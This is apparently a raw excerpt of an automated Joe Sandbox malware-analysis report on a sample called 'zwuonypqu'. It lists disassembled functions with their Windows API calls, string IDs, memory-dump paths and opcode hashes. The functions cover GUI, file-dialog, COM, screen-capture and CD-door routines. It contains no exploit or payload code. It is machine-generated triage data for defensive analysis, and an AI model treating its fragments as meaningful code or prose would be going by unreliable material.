                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                        • API String ID: 4085615965-3440237614
                        • Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                        • Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
                        • Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                        • Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: __wcsicoll
                        • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                        • API String ID: 3832890014-4202584635
                        • Opcode ID: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                        • Instruction ID: bf73cd225697d97a5a257e466bf5c8c79b4efa22739c650e03c6b1f9c6e9338c
                        • Opcode Fuzzy Hash: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                        • Instruction Fuzzy Hash: 1D01616160562122FE11322A7C03BDF15898F5139AF14447BFC05F1282FF4DDA8692EE
                        APIs
                        • _memset.LIBCMT ref: 004669C4
                        • _wcsncpy.LIBCMT ref: 00466A21
                        • _wcsncpy.LIBCMT ref: 00466A4D
                          • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                          • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                        • _wcstok.LIBCMT ref: 00466A90
                          • Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9
                        • _wcstok.LIBCMT ref: 00466B3F
                        • _wcscpy.LIBCMT ref: 00466BC8
                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
                        • _wcslen.LIBCMT ref: 00466D1D
                        • _memset.LIBCMT ref: 00466BEE
                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                        • _wcslen.LIBCMT ref: 00466D4B
                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: _wcslen$FileName_memset_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                        • String ID: X$HH
                        • API String ID: 3021350936-1944015008
                        • Opcode ID: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
                        • Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
                        • Opcode Fuzzy Hash: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
                        • Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: InfoItemMenu$Sleep_memset
                        • String ID: 0
                        • API String ID: 1504565804-4108050209
                        • Opcode ID: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                        • Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
                        • Opcode Fuzzy Hash: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                        • Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Window$CreateDestroy
                        • String ID: ,$tooltips_class32
                        • API String ID: 1109047481-3856767331
                        • Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                        • Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
                        • Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                        • Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59
                        APIs
                        • _wcsncpy.LIBCMT ref: 0045CCFA
                        • __wsplitpath.LIBCMT ref: 0045CD3C
                        • _wcscat.LIBCMT ref: 0045CD51
                        • _wcscat.LIBCMT ref: 0045CD63
                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C
                          • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                        • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
                        • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
                        • _wcscpy.LIBCMT ref: 0045CE14
                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                        • String ID: *.*
                        • API String ID: 1153243558-438819550
                        • Opcode ID: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                        • Instruction ID: 4b7f18f3392d5c51d0b0bcfc25b88d1348604f1c1aa494fd035d881d108a9fe9
                        • Opcode Fuzzy Hash: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                        • Instruction Fuzzy Hash: 0561E5B61043419FD731EF54C885AEBB7E4EB84305F44882FED8983242D67D998E879E
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
                        • String ID: 0
                        • API String ID: 1663942905-4108050209
                        • Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                        • Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
                        • Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                        • Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
                        • String ID:
                        • API String ID: 1481289235-0
                        • Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                        • Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
                        • Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                        • Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58
                        APIs
                        • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
                        • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
                        • SendMessageW.USER32 ref: 0046FBAF
                        • SendMessageW.USER32 ref: 0046FBE2
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
                        • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
                        • ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
                        • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
                        • SendMessageW.USER32 ref: 0046FD00
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend$IconImageList_$CreateExtractReplace
                        • String ID:
                        • API String ID: 2632138820-0
                        • Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                        • Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
                        • Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                        • Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CursorLoad
                        • String ID:
                        • API String ID: 3238433803-0
                        • Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                        • Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
                        • Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                        • Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A
                        APIs
                        • GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
                        • _wcslen.LIBCMT ref: 00460B00
                        • __swprintf.LIBCMT ref: 00460B9E
                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
                        • GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
                        • GetDlgCtrlID.USER32 ref: 00460CE6
                        • GetWindowRect.USER32(?,?), ref: 00460D21
                        • GetParent.USER32(?), ref: 00460D40
                        • ScreenToClient.USER32(00000000), ref: 00460D47
                        • GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
                        • GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                        • String ID: %s%u
                        • API String ID: 1899580136-679674701
                        • Opcode ID: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                        • Instruction ID: ed0b46c26cbb3f928a943cd91895a09858176ee0e89b0f6962e21683ef9d2041
                        • Opcode Fuzzy Hash: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                        • Instruction Fuzzy Hash: 3AA1CD722043019BDB14DF54C884BEB73A8FF84714F04892EFD889B245E778E946CBA6
                        APIs
                        • CoTaskMemFree.OLE32(?), ref: 0047D6D3
                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                        • StringFromCLSID.OLE32(?,?), ref: 0047D6B5
                          • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                          • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                        • StringFromIID.OLE32(?,?), ref: 0047D7F0
                        • CoTaskMemFree.OLE32(?), ref: 0047D80A
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: FreeFromStringTask_wcslen$_wcscpy
                        • String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
                        • API String ID: 2485709727-934586222
                        • Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                        • Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
                        • Opcode Fuzzy Hash: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                        • Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
                        • String ID: HH
                        • API String ID: 3381189665-2761332787
                        • Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                        • Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
                        • Opcode Fuzzy Hash: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                        • Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A
                        APIs
                        • GetDC.USER32(00000000), ref: 00434585
                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
                        • CreateCompatibleDC.GDI32(00000000), ref: 0043459B
                        • SelectObject.GDI32(00000000,?), ref: 004345A9
                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
                        • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                        • String ID: (
                        • API String ID: 3300687185-3887548279
                        • Opcode ID: 476d3880b0111a701be564dbd72c1b8a6ec07134805c18a45c236b2e8634d1e4
                        • Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
                        • Opcode Fuzzy Hash: 476d3880b0111a701be564dbd72c1b8a6ec07134805c18a45c236b2e8634d1e4
                        • Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66
                        APIs
                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                        • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
                        • __swprintf.LIBCMT ref: 0045E4D9
                        • _printf.LIBCMT ref: 0045E595
                        • _printf.LIBCMT ref: 0045E5B7
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: LoadString_printf$__swprintf_wcslen
                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
                        • API String ID: 3590180749-2894483878
                        • Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                        • Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
                        • Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                        • Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A
                        APIs
                        • GetWindowLongW.USER32(?,000000F0), ref: 0046F911
                        • LoadImageW.USER32 ref: 0046F929
                        • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
                        • DeleteObject.GDI32(?), ref: 0046F950
                        • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
                        • LoadImageW.USER32 ref: 0046F9A8
                        • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
                        • DeleteObject.GDI32(?), ref: 0046F9CF
                        • DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
                        • ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
                        • DestroyIcon.USER32(?), ref: 0046FA4F
                        • SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
                        • DeleteObject.GDI32(?), ref: 0046FA68
                        • DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
                        • String ID:
                        • API String ID: 3412594756-0
                        • Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                        • Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
                        • Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                        • Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A
                        APIs
                          • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?), ref: 0045336E
                          • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                        • GetDriveTypeW.KERNEL32 ref: 0045DA30
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: SendString$_wcslen$BuffCharDriveLowerType
                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                        • API String ID: 4013263488-4113822522
                        • Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                        • Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
